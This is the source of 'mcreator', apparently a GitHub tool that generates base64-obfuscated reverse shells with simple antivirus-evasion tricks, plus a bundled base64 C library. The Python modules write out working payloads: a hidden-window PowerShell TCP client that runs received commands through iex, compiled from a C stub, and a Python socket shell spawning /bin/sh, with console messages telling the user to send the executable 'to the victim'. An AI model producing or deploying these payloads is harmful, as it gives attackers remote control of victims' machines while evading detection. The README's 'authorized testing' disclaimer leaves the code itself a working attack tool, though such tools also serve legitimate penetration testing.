├── README.md ├── lib ├── b64.h ├── encode.c └── decode.c ├── mcreatorlib.py ├── mcreatorshells.py ├── mcreator.py └── mcreatortechniques.py /README.md: -------------------------------------------------------------------------------- 1 | # mcreator 2 | Encoded Reverse Shell Generator With Techniques To Bypass AV's (for authorized security testing only) 3 | 4 | ## Installation 5 | ``` 6 | git clone https://github.com/blacknbunny/mcreator.git && cd mcreator/ && python mcreator.py 7 | ``` 8 | 9 | ## Version 10 | ***python 2.7.**** only. The scripts rely on Python 2-only APIs (e.g. `raw_input()` and writing `str` to files opened in binary `"wb+"` mode), so they will not run unchanged on Python 3. Note that Python 2.7 is end-of-life; run the tool in an isolated environment. 11 | 12 | ## Running mcreator console 13 | ``` 14 | python mcreator.py -rsg console 15 | ``` 16 | 17 | ## Commands 18 | https://github.com/blacknbunny/mcreator/wiki/Commands 19 | 20 | ## Reverse Shells 21 | https://github.com/blacknbunny/mcreator/wiki/Reverse-Shells 22 | 23 | ## Techniques 24 | https://github.com/blacknbunny/mcreator/wiki/Techniques — Note: the bundled techniques (a trivial `strstr` self-check, a large `malloc`/`memset`, and a long counting loop) are simple static/emulation-evasion tricks. The generated stub still base64-decodes the PowerShell command at runtime and hands it to `system()` in clear text, so it remains visible to process command-line logging and may be captured by PowerShell script block logging; do not treat "bypass" as a guarantee against current AV/EDR. 25 | 26 | ## Compiling 27 | https://github.com/blacknbunny/mcreator/wiki/Compiling 28 | 29 | ## An example of the tool 30 | https://github.com/blacknbunny/mcreator/wiki/An-example 31 | 32 | ## Help 33 | ``` 34 | usage: mcreator.py [-h] [-rsg RSGENERATOR] 35 | 36 | Reverse Shell generator with techniques to bypass all the AV's 37 | 38 | optional arguments: 39 | -h, --help show this help message and exit 40 | -rsg RSGENERATOR, --rsgenerator RSGENERATOR 41 | Reverse Shell Generator With Encryptions & Techniques 42 | ``` 43 | -------------------------------------------------------------------------------- /lib/b64.h: -------------------------------------------------------------------------------- 1 | 2 | /** 3 | * `b64.h' - b64 4 | * 5 | * copyright (c) 2014 joseph werle 6 | */ 7 | 8 | #ifndef B64_H 9 | #define B64_H 1 10 | 11 | /** 12 | * Memory allocation functions to use. You can define b64_malloc and 13 | * b64_realloc to custom functions if you want. 
14 | */ 15 | 16 | #ifndef b64_malloc 17 | # define b64_malloc(ptr) malloc(ptr) 18 | #endif 19 | #ifndef b64_realloc 20 | # define b64_realloc(ptr, size) realloc(ptr, size) 21 | #endif 22 | 23 | /** 24 | * Base64 index table. 25 | */ 26 | 27 | static const char b64_table[] = { 28 | 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 29 | 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 30 | 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 31 | 'Y', 'Z', 'a', 'b', 'c', 'd', 'e', 'f', 32 | 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 33 | 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 34 | 'w', 'x', 'y', 'z', '0', '1', '2', '3', 35 | '4', '5', '6', '7', '8', '9', '+', '/' 36 | }; 37 | 38 | #ifdef __cplusplus 39 | extern "C" { 40 | #endif 41 | 42 | /** 43 | * Encode `unsigned char *' source with `size_t' size. 44 | * Returns a heap-allocated, NUL-terminated `char *' base64 encoded string owned by the caller, or NULL if the initial allocation fails. NOTE(review): encode.c does not check the results of its later realloc() calls. 45 | */ 46 | 47 | char * 48 | b64_encode (const unsigned char *, size_t); 49 | 50 | /** 51 | * Decode `char *' source with `size_t' size. Decoding stops at the first `=' or non-base64 character. 52 | * Returns a heap-allocated, NUL-terminated `unsigned char *' buffer of decoded bytes owned by the caller, or NULL on allocation failure. The decoded data may itself contain NUL bytes, so use b64_decode_ex when the decoded length matters. 53 | */ 54 | unsigned char * 55 | b64_decode (const char *, size_t); 56 | 57 | /** 58 | * Decode `char *' source with `size_t' size, exactly as b64_decode does. 59 | * Returns the decoded buffer and, when the `size_t *' argument is non-NULL, stores the decoded length in it. 
60 | */ 61 | unsigned char * 62 | b64_decode_ex (const char *, size_t, size_t *); 63 | 64 | #ifdef __cplusplus 65 | } 66 | #endif 67 | 68 | #endif -------------------------------------------------------------------------------- /mcreatorlib.py: -------------------------------------------------------------------------------- 1 | reverse_shell = "" 2 | lhost = "192.168.0.101" 3 | lport = int(4444) 4 | encode_type = "" 5 | technique = "" 6 | 7 | def reverse_shells(): 8 | print("\nWindows : ") 9 | print("powershell # OS : Windows(x86, x64), Type : Command line, File type : *.exe") 10 | print("\nLinux : ") 11 | print("python # OS : Linux(x86, x86_64), Type : Command line, File type : *.py\n") 12 | def techniques(): 13 | print("\n(0) : Don't want to use any technique") 14 | print("\n(1) : strstr # Default\n") 15 | print("(2) : toomuchmem\n") 16 | print("(3) : increment\n") 17 | def encode_types(): 18 | print("\nbase64 *= ( default )\n") 19 | def help(): 20 | print("\nShows :\n") 21 | print("show reverse_shells # Shows reverse_shells list") 22 | print("show techniques # Shows techniques that you can use with reverse_shells to bypass AV's") 23 | print("show encode_types # Shows Encode Types To Escape AV's") 24 | print("show help # Shows help menu of commands\n\n") 25 | print("Sets :\n") 26 | print("set reverse_shell [powershell, python ..] 
# Sets Reverse Shell") 27 | print("set LHOST [ip] # Sets Local Host") 28 | print("set LPORT [port] # Sets Local Port") 29 | print("set encode [encode_type] # Sets Encode Type Of Reverse Shell\n") 30 | print("Others: \n") 31 | print("run # Creates the encoded reverse_shell file if set options is right") 32 | print("exit # Exits from the script\n") 33 | def exit(): 34 | print("Exit successful !") 35 | 36 | -------------------------------------------------------------------------------- /lib/encode.c: -------------------------------------------------------------------------------- 1 | 2 | /** 3 | * `encode.c' - b64 4 | * 5 | * copyright (c) 2014 joseph werle 6 | */ 7 | 8 | #include 9 | #include 10 | #include "b64.h" 11 | 12 | #ifdef b64_USE_CUSTOM_MALLOC 13 | extern void* b64_malloc(size_t); 14 | #endif 15 | 16 | #ifdef b64_USE_CUSTOM_REALLOC 17 | extern void* b64_realloc(void*, size_t); 18 | #endif 19 | 20 | char * 21 | b64_encode (const unsigned char *src, size_t len) { 22 | int i = 0; 23 | int j = 0; 24 | char *enc = NULL; 25 | size_t size = 0; 26 | unsigned char buf[4]; 27 | unsigned char tmp[3]; 28 | 29 | // alloc 30 | enc = (char *) b64_malloc(1); 31 | if (NULL == enc) { return NULL; } 32 | 33 | // parse until end of source 34 | while (len--) { 35 | // read up to 3 bytes at a time into `tmp' 36 | tmp[i++] = *(src++); 37 | 38 | // if 3 bytes read then encode into `buf' 39 | if (3 == i) { 40 | buf[0] = (tmp[0] & 0xfc) >> 2; 41 | buf[1] = ((tmp[0] & 0x03) << 4) + ((tmp[1] & 0xf0) >> 4); 42 | buf[2] = ((tmp[1] & 0x0f) << 2) + ((tmp[2] & 0xc0) >> 6); 43 | buf[3] = tmp[2] & 0x3f; 44 | 45 | // allocate 4 new byts for `enc` and 46 | // then translate each encoded buffer 47 | // part by index from the base 64 index table 48 | // into `enc' unsigned char array 49 | enc = (char *) b64_realloc(enc, size + 4); 50 | for (i = 0; i < 4; ++i) { 51 | enc[size++] = b64_table[buf[i]]; 52 | } 53 | 54 | // reset index 55 | i = 0; 56 | } 57 | } 58 | 59 | // remainder 60 | if (i > 0) { 
61 | // fill `tmp' with `\0' at most 3 times 62 | for (j = i; j < 3; ++j) { 63 | tmp[j] = '\0'; 64 | } 65 | 66 | // perform same codec as above 67 | buf[0] = (tmp[0] & 0xfc) >> 2; 68 | buf[1] = ((tmp[0] & 0x03) << 4) + ((tmp[1] & 0xf0) >> 4); 69 | buf[2] = ((tmp[1] & 0x0f) << 2) + ((tmp[2] & 0xc0) >> 6); 70 | buf[3] = tmp[2] & 0x3f; 71 | 72 | // perform same write to `enc` with new allocation 73 | for (j = 0; (j < i + 1); ++j) { 74 | enc = (char *) b64_realloc(enc, size + 1); 75 | enc[size++] = b64_table[buf[j]]; 76 | } 77 | 78 | // while there is still a remainder 79 | // append `=' to `enc' 80 | while ((i++ < 3)) { 81 | enc = (char *) b64_realloc(enc, size + 1); 82 | enc[size++] = '='; 83 | } 84 | } 85 | 86 | // Make sure we have enough space to add '\0' character at end. 87 | enc = (char *) b64_realloc(enc, size + 1); 88 | enc[size] = '\0'; 89 | 90 | return enc; 91 | } -------------------------------------------------------------------------------- /mcreatorshells.py: -------------------------------------------------------------------------------- 1 | def powershell(lhost, lport): 2 | file = open("lib/pwshell.c", "wb+") 3 | start_one = "cG93ZXJzaGVsbCAtTm9QIC1Ob25JIC1XIEhpZGRlbiAtRXhlYyBCeXBhc3MgLUNvbW1hbmQgXCIkY2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlNvY2tldHMuVENQQ2xpZW50KCc=" 4 | start_two = "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" 5 | 6 | file.write("""#include 7 | #include 8 | #include 9 | #include "b64.h" 10 | 11 | int main(){ 12 | char *str = "cG93ZXJzaGVsbCAtTm9QIC1Ob25JIC1XIEhpZGRlbiAtRXhlYyBCeXBhc3MgLUNvbW1hbmQgIiRjbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuU29ja2V0cy5UQ1BDbGllbnQoJw=="; 13 | char *str3 = b64_decode(str, strlen(str)); 14 | char str5[1024]; 15 | snprintf(str5, sizeof(str5), "%02s""" + lhost + """',""" + str(lport) + """);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0,$bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, 
$i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 =$sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\\"", str3); 16 | system(str5); 17 | } 18 | 19 | """) 20 | print("\n[+] Hidden Process Base64 Encoded Powershell Reverse Shell generated [+]") 21 | print("\n[+] How to compile : gcc lib/decode.c lib/pwshell.c -o pwshell [+]\n") 22 | print("[+] After compiling you can send the reverse shell(pwshell.exe) to the victim [+]\n") 23 | 24 | def python(lhost, lport): 25 | file = open("lib/pyshell.py", "wb+") 26 | 27 | file.write("""from os import system 28 | from base64 import b64decode 29 | 30 | str = "Iiw=" 31 | str1 = "cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgi" 32 | str2 = "KSk7b3MuZHVwMihzLmZpbGVubygpLDApOyBvcy5kdXAyKHMuZmlsZW5vKCksMSk7IG9zLmR1cDIocy5maWxlbm8oKSwyKTtwPXN1YnByb2Nlc3MuY2FsbChbIi9iaW4vc2giLCItaSJdKTsn" 33 | 34 | str3 = "%s" % (b64decode(str1) + \"""" + lhost + """\" + b64decode(str) + \"""" + str(lport) + """\" + b64decode(str2)) 35 | 36 | system(str3) 37 | """) 38 | print("\n[+] Base64 Encoded Python Reverse Shell Generated [+]") 39 | print("\nPath : lib/pyshell.py\n") 40 | -------------------------------------------------------------------------------- /lib/decode.c: -------------------------------------------------------------------------------- 1 | 2 | /** 3 | * `decode.c' - b64 4 | * 5 | * copyright (c) 2014 joseph werle 6 | */ 7 | 8 | #include 9 | #include 10 | #include 11 | #include "b64.h" 12 | 13 | #ifdef b64_USE_CUSTOM_MALLOC 14 | extern void* b64_malloc(size_t); 15 | #endif 16 | 17 | #ifdef b64_USE_CUSTOM_REALLOC 18 | extern void* b64_realloc(void*, size_t); 19 | #endif 20 | 21 | unsigned char * 22 | b64_decode (const char *src, size_t len) { 23 | return b64_decode_ex(src, len, NULL); 24 | } 25 | 26 | unsigned char * 27 | 
b64_decode_ex (const char *src, size_t len, size_t *decsize) { 28 | int i = 0; 29 | int j = 0; 30 | int l = 0; 31 | size_t size = 0; 32 | unsigned char *dec = NULL; 33 | unsigned char buf[3]; 34 | unsigned char tmp[4]; 35 | 36 | // alloc 37 | dec = (unsigned char *) b64_malloc(1); 38 | if (NULL == dec) { return NULL; } 39 | 40 | // parse until end of source 41 | while (len--) { 42 | // break if char is `=' or not base64 char 43 | if ('=' == src[j]) { break; } 44 | if (!(isalnum(src[j]) || '+' == src[j] || '/' == src[j])) { break; } 45 | 46 | // read up to 4 bytes at a time into `tmp' 47 | tmp[i++] = src[j++]; 48 | 49 | // if 4 bytes read then decode into `buf' 50 | if (4 == i) { 51 | // translate values in `tmp' from table 52 | for (i = 0; i < 4; ++i) { 53 | // find translation char in `b64_table' 54 | for (l = 0; l < 64; ++l) { 55 | if (tmp[i] == b64_table[l]) { 56 | tmp[i] = l; 57 | break; 58 | } 59 | } 60 | } 61 | 62 | // decode 63 | buf[0] = (tmp[0] << 2) + ((tmp[1] & 0x30) >> 4); 64 | buf[1] = ((tmp[1] & 0xf) << 4) + ((tmp[2] & 0x3c) >> 2); 65 | buf[2] = ((tmp[2] & 0x3) << 6) + tmp[3]; 66 | 67 | // write decoded buffer to `dec' 68 | dec = (unsigned char *) b64_realloc(dec, size + 3); 69 | if (dec != NULL){ 70 | for (i = 0; i < 3; ++i) { 71 | dec[size++] = buf[i]; 72 | } 73 | } else { 74 | return NULL; 75 | } 76 | 77 | // reset 78 | i = 0; 79 | } 80 | } 81 | 82 | // remainder 83 | if (i > 0) { 84 | // fill `tmp' with `\0' at most 4 times 85 | for (j = i; j < 4; ++j) { 86 | tmp[j] = '\0'; 87 | } 88 | 89 | // translate remainder 90 | for (j = 0; j < 4; ++j) { 91 | // find translation char in `b64_table' 92 | for (l = 0; l < 64; ++l) { 93 | if (tmp[j] == b64_table[l]) { 94 | tmp[j] = l; 95 | break; 96 | } 97 | } 98 | } 99 | 100 | // decode remainder 101 | buf[0] = (tmp[0] << 2) + ((tmp[1] & 0x30) >> 4); 102 | buf[1] = ((tmp[1] & 0xf) << 4) + ((tmp[2] & 0x3c) >> 2); 103 | buf[2] = ((tmp[2] & 0x3) << 6) + tmp[3]; 104 | 105 | // write remainer decoded buffer to `dec' 
106 | dec = (unsigned char *) b64_realloc(dec, size + (i - 1)); 107 | if (dec != NULL){ 108 | for (j = 0; (j < i - 1); ++j) { 109 | dec[size++] = buf[j]; 110 | } 111 | } else { 112 | return NULL; 113 | } 114 | } 115 | 116 | // Make sure we have enough space to add '\0' character at end. 117 | dec = (unsigned char *) b64_realloc(dec, size + 1); 118 | if (dec != NULL){ 119 | dec[size] = '\0'; 120 | } else { 121 | return NULL; 122 | } 123 | 124 | // Return back the size of decoded string if demanded. 125 | if (decsize != NULL) { 126 | *decsize = size; 127 | } 128 | 129 | return dec; 130 | } -------------------------------------------------------------------------------- /mcreator.py: -------------------------------------------------------------------------------- 1 | import mcreatorlib, mcreatorshells, mcreatortechniques 2 | import socket, subprocess, argparse 3 | from sys import argv, exit 4 | 5 | __AUTHOR__ = "@blacknbunny" 6 | 7 | parser = argparse.ArgumentParser(description="Reverse Shell & Injector generator with techniques to bypass all the AV's") 8 | parser.add_argument('-rsg', '--rsgenerator', help='Reverse Shell Generator With Encryptions & Techniques You Add Or Pick') 9 | args = parser.parse_args() 10 | 11 | if not len(argv) > 1: 12 | parser.print_help() 13 | exit(1) 14 | 15 | class ReverseShellGenerator: 16 | def set_technique(self, creator, technique, lhost, lport): 17 | egg = 0 18 | if technique == "0": 19 | mcreatortechniques.zerotechnique() 20 | elif technique == "": 21 | mcreatortechniques.zerotechnique() 22 | elif technique == "show techniques": 23 | mcreatorlib.techniques() 24 | elif technique == "1": 25 | print("\nTechnique = strstr\n") 26 | mcreatorlib.technique = "strstr" 27 | mcreatortechniques.strstr(lhost, lport) 28 | elif technique == "2": 29 | print("\nTechnique = toomuchmem\n") 30 | mcreatorlib.technique = "toomuchmem" 31 | mcreatortechniques.toomuchmem(lhost, lport) 32 | elif technique == "3": 33 | print("\nTechnique = increment\n") 34 | 
mcreatorlib.technique = "increment" 35 | mcreatortechniques.increment(lhost, lport) 36 | else: 37 | mcreatortechniques.zerotechnique() 38 | 39 | def set_lhost(self, creator): 40 | err = 0 41 | mcreatorlib.lhost = creator[10:] 42 | try: 43 | socket.inet_aton(mcreatorlib.lhost) 44 | except socket.error: 45 | err = 1 46 | print("[!] Not A Valid IP Address : " + mcreatorlib.lhost ) 47 | if err != 1: 48 | print("\nLHOST = " + mcreatorlib.lhost + "\n") 49 | 50 | 51 | def set_lport(self, creator): 52 | mcreatorlib.lport = int(creator[10:]) 53 | if type(mcreatorlib.lport) == int: 54 | print("\nLPORT = " + str(mcreatorlib.lport) + "\n") 55 | else: 56 | print("\n[!] Not A Valid Port : " + str(mcreatorlib.lport) + "\n" ) 57 | 58 | def set_encode(self, creator): 59 | mcreatorlib.encode_type = creator[11:] 60 | if mcreatorlib.encode_type == "base64": 61 | print("\nEncode Type = " + mcreatorlib.encode_type + "\n") 62 | else: 63 | print("\nshow encode_types\n") 64 | 65 | def set_reverse_shell(self, creator): 66 | if creator[18:] == "powershell": 67 | mcreatorlib.reverse_shell = "powershell" 68 | print("\nreverse_shell = powershell\n") 69 | elif creator[18:] == "python": 70 | mcreatorlib.reverse_shell = "python" 71 | print("\nreverse_shell = python\n") 72 | else: 73 | print("\nshow reverse_shells\n") 74 | 75 | def run(self, lhost, lport, reverse_shell): 76 | if lhost == "": 77 | print("\n[!] Wrong LHOST, LPORT or encode_type. Can't run please start script again. 
[!]\n") 78 | exit(1) 79 | if reverse_shell == "powershell": 80 | mcreatorshells.powershell(lhost, lport) 81 | if reverse_shell == "python": 82 | mcreatorshells.python(lhost, lport) 83 | 84 | 85 | def allinone(self): 86 | count = 0 87 | reverse_shell = "" 88 | lhost = "" 89 | lport = 4444 90 | encode_type = "" 91 | 92 | while count == 0: 93 | creator = raw_input("creator > ") 94 | 95 | if creator.startswith("set"): 96 | if creator[4:17] == "reverse_shell": 97 | if creator[18:] == "powershell": 98 | print("") 99 | technique = raw_input("Technique (show techniques) : ") 100 | set_technique = self.set_technique(creator, technique, lhost, lport) 101 | else: 102 | self.set_reverse_shell(creator) 103 | reverse_shell = mcreatorlib.reverse_shell 104 | elif creator[4:9] == "LHOST": 105 | self.set_lhost(creator) 106 | lhost = mcreatorlib.lhost 107 | elif creator[4:9] == "LPORT": 108 | self.set_lport(creator) 109 | lport = mcreatorlib.lport 110 | elif creator[4:10] == "encode": 111 | self.set_encode(creator) 112 | encode_type = mcreatorlib.encode_type 113 | else: 114 | print("\n[!] 
Unknown set option\n") 115 | elif creator == "show reverse_shells": 116 | mcreatorlib.reverse_shells() 117 | elif creator == "show techniques": 118 | mcreatorlib.techniques() 119 | elif creator == "show encode_types": 120 | mcreatorlib.encode_types() 121 | elif creator == "run": 122 | self.run(lhost, lport, reverse_shell) 123 | if mcreatorlib.technique != "": 124 | mcreatortechniques.printtechnique(mcreatorlib.technique) 125 | mcreatorlib.technique = "" 126 | elif creator == "show help": 127 | mcreatorlib.help() 128 | elif creator == "exit": 129 | mcreatorlib.exit() 130 | count = 1 131 | else: 132 | print("\nCommand for help: show help\n") 133 | def main(): 134 | try: 135 | if args.rsgenerator == "console": 136 | rsgenerator = ReverseShellGenerator() 137 | rsgenerator.allinone() 138 | except Exception as e: 139 | print(e) 140 | parser.print_help() 141 | exit(1) 142 | 143 | if __name__ == '__main__': 144 | try: 145 | exit(main()) 146 | except KeyboardInterrupt as e: 147 | print("^C") 148 | -------------------------------------------------------------------------------- /mcreatortechniques.py: -------------------------------------------------------------------------------- 1 | def zerotechnique(): 2 | print("Technique = 0 # Not Using Any Technique") 3 | def printtechnique(technique): 4 | print("\n[+] Hidden Process Base64 Encoded Powershell Reverse Shell generated [+]") 5 | print("\n[+] How to compile : gcc lib/decode.c lib/pwshell.c -o pwshell [+]\n") 6 | print("[+] Technique = " + technique + " [+]\n") 7 | print("[+] After compiling you can send the reverse shell(pwshell.exe) to the victim [+]\n") 8 | 9 | def strstr(lhost, lport): 10 | file = open("lib/pwshell.c", "wb+") 11 | start_one = "cG93ZXJzaGVsbCAtTm9QIC1Ob25JIC1XIEhpZGRlbiAtRXhlYyBCeXBhc3MgLUNvbW1hbmQgXCIkY2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlNvY2tldHMuVENQQ2xpZW50KCc=" 12 | start_two = 
"JHN0cmVhbSA9ICRjbGllbnQuR2V0U3RyZWFtKCk7W2J5dGVbXV0kYnl0ZXMgPSAwLi42NTUzNXwlezB9O3doaWxlKCgkaSA9ICRzdHJlYW0uUmVhZCgkYnl0ZXMsIDAsJGJ5dGVzLkxlbmd0aCkpIC1uZSAwKXs7JGRhdGEgPSAoTmV3LU9iamVjdCAtVHlwZU5hbWUgU3lzdGVtLlRleHQuQVNDSUlFbmNvZGluZykuR2V0U3RyaW5nKCRieXRlcywwLCAkaSk7JHNlbmRiYWNrID0gKGlleCAkZGF0YSAyPiYxIHwgT3V0LVN0cmluZyApOyRzZW5kYmFjazIgPSRzZW5kYmFjayArICdQUyAnICsgKHB3ZCkuUGF0aCArICc+ICc7JHNlbmRieXRlID0gKFt0ZXh0LmVuY29kaW5nXTo6QVNDSUkpLkdldEJ5dGVzKCRzZW5kYmFjazIpOyRzdHJlYW0uV3JpdGUoJHNlbmRieXRlLDAsJHNlbmRieXRlLkxlbmd0aCk7JHN0cmVhbS5GbHVzaCgpfTskY2xpZW50LkNsb3NlKClcIiIpOwo=" 13 | 14 | file.write("""#include 15 | #include 16 | #include 17 | #include "b64.h" 18 | 19 | int main(int argc, char * argv[]){ 20 | if(strstr(argv[0], argv[0]) >0){ 21 | char *str = "cG93ZXJzaGVsbCAtTm9QIC1Ob25JIC1XIEhpZGRlbiAtRXhlYyBCeXBhc3MgLUNvbW1hbmQgIiRjbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuU29ja2V0cy5UQ1BDbGllbnQoJw=="; 22 | char *str3 = b64_decode(str, strlen(str)); 23 | char str5[1024]; 24 | snprintf(str5, sizeof(str5), "%02s""" + lhost + """',""" + str(lport) + """);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0,$bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 =$sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\\"", str3); 25 | system(str5); 26 | } 27 | } 28 | 29 | """) 30 | 31 | def toomuchmem(lhost,lport): 32 | file = open("lib/pwshell.c", "wb+") 33 | start_one = "cG93ZXJzaGVsbCAtTm9QIC1Ob25JIC1XIEhpZGRlbiAtRXhlYyBCeXBhc3MgLUNvbW1hbmQgXCIkY2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlNvY2tldHMuVENQQ2xpZW50KCc=" 34 | start_two = "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" 35 | 36 | file.write("""#include 37 | #include 38 | #include 39 | #include "b64.h" 40 | 41 | #define TOO_MUCH_MEM 100000000 42 
| 43 | int main(){ 44 | char * memdmp = NULL; 45 | memdmp = (char *) malloc(TOO_MUCH_MEM); 46 | if(memdmp!=NULL) 47 | { 48 | memset(memdmp,00, TOO_MUCH_MEM); 49 | free(memdmp); 50 | char *str = "cG93ZXJzaGVsbCAtTm9QIC1Ob25JIC1XIEhpZGRlbiAtRXhlYyBCeXBhc3MgLUNvbW1hbmQgIiRjbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuU29ja2V0cy5UQ1BDbGllbnQoJw=="; 51 | char *str3 = b64_decode(str, strlen(str)); 52 | char str5[1024]; 53 | snprintf(str5, sizeof(str5), "%02s""" + lhost + """',""" + str(lport) + """);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0,$bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 =$sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\\"", str3); 54 | system(str5); 55 | } 56 | } 57 | 58 | """) 59 | 60 | 61 | def increment(lhost,lport): 62 | file = open("lib/pwshell.c", "wb+") 63 | start_one = "cG93ZXJzaGVsbCAtTm9QIC1Ob25JIC1XIEhpZGRlbiAtRXhlYyBCeXBhc3MgLUNvbW1hbmQgXCIkY2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlNvY2tldHMuVENQQ2xpZW50KCc=" 64 | start_two = "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" 65 | 66 | file.write("""#include 67 | #include 68 | #include 69 | #include "b64.h" 70 | 71 | #define MAX_OP 100000000 72 | 73 | int main(){ 74 | int cpt = 0; 75 | int i = 0; 76 | for (i =0; i < MAX_OP; i ++) 77 | { 78 | cpt++; 79 | } 80 | if(cpt == MAX_OP) 81 | { 82 | char *str = "cG93ZXJzaGVsbCAtTm9QIC1Ob25JIC1XIEhpZGRlbiAtRXhlYyBCeXBhc3MgLUNvbW1hbmQgIiRjbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuU29ja2V0cy5UQ1BDbGllbnQoJw=="; 83 | char *str3 = b64_decode(str, strlen(str)); 84 | char str5[1024]; 85 | snprintf(str5, sizeof(str5), "%02s""" + lhost + """',""" + str(lport) + """);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0,$bytes.Length)) 
-ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 =$sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\\"", str3); 86 | system(str5); 87 | } 88 | } 89 | 90 | """) 91 | --------------------------------------------------------------------------------